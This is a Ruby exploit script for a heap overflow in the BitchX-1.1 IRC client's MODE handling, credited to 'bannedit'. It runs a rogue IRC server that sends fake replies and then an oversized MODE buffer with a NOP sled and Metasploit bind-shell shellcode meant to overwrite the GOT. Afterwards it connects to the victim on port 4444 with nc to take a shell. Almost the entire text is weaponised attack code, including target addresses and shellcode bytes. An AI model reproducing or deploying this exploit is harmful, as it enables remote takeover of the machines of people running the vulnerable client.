#!/usr/bin/env ruby ###################################################### # BitchX-1.1 Final MODE Heap Overflow [0-day] # By bannedit # Discovered May 16th 2007 # - Yet another overflow which can overwrite GOT # # I found this vuln after modifying ilja's ircfuzz # code. Currently this exploit attempts to # overwrite the GOT with the ret address to the # shellcode. # # The actually vulnerability appears to be a stack # overflow in p_mode. Due to input size restrictions # the overflow can't occur on the stack because we can # only overflow so much data. Luckily though we # overwrite a structure containing pointers to heap # data. This allows us to overwrite the GOT. # # Reliability of this exploit in its current stage is # limited. There appears to be several factors which # restrict the reliability. ####################################################### require 'socket' #the linux 2.6 target most effective atm targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => '0x8154d70','freebsd' => '0x41414141' } shellcode = #fork before binding a shell provides a clean exit "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+ #metasploit linux x86 shellcode bind tcp port 4444 "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+ "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+ "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+ "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+ "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+ "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+ "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38" port = (ARGV[0] || 6667).to_i sock = TCPServer.new('0.0.0.0', port) ret = (targets['linux 2.6 Hardened (FC6)'].hex) puts "----------------------------------------------" puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" puts "- By bannedit -" puts "----------------------------------------------" puts "\n[-] listening for incoming clients..." while (client = sock.accept) ip = client.peeraddr buffer = client.gets puts "[<] #{buffer}" hostname = ([ret].pack('V')) * 13 nick = "bannedit" #Fake server reply to connection buffer = ":#{nick} MODE #{nick} :+iw\r\n"+ ":0 001 #{nick} :biznitch-1.0\r\n"+ ":5 002 #{nick} :biznitch-1.0\r\n"+ ":6 003 #{nick} :a\r\n"+ ":aaa 004 #{nick} :a\r\n"+ ":aaa 005 #{nick} :a\r\n"+ ":aaa 251 #{nick} :a\r\n"+ ":aaa 252 #{nick} :a\r\n"+ ":aaa 253 #{nick} :a\r\n"+ ":aaa 254 #{nick} :a\r\n"+ ":aaa 255 #{nick} :a\r\n"+ ":aaa 375 #{nick} :a\r\n"+ ":aaa 372 #{nick} :a\r\n"+ ":aaa 376 #{nick} :a\r\n" join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+ ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n" puts "[>] sending fake server response" client.send(buffer, 0) sleep(2) # client.send(join, 0) topic = ":aaa TOPIC #hackers:" ret = ret + 0x200 topic<< ([ret].pack('V')) * 100 topic<< "\r\n" for i in 0..20 client.send(topic, 0) end puts "[>] sending evil buffer" evilbuf = ":#{hostname} MODE " evilbuf<< "#{nick} :aaa" ret = ret + 0x200 evilbuf<< ([ret].pack('V')) * 200 evilbuf<< "\x90" * (1126 - shellcode.length) evilbuf<< shellcode evilbuf<< "\x90" * 40 evilbuf<< "\r\n" for i in 0..5 client.send(evilbuf, 0) end sleep(10) #wait for the shellcode to do its thing... puts "[+] exploit completed if successful port 4444 should be open" puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n" fork { system("nc #{ip[3]} 4444") puts "[+] exiting shell dropping back to listener" } end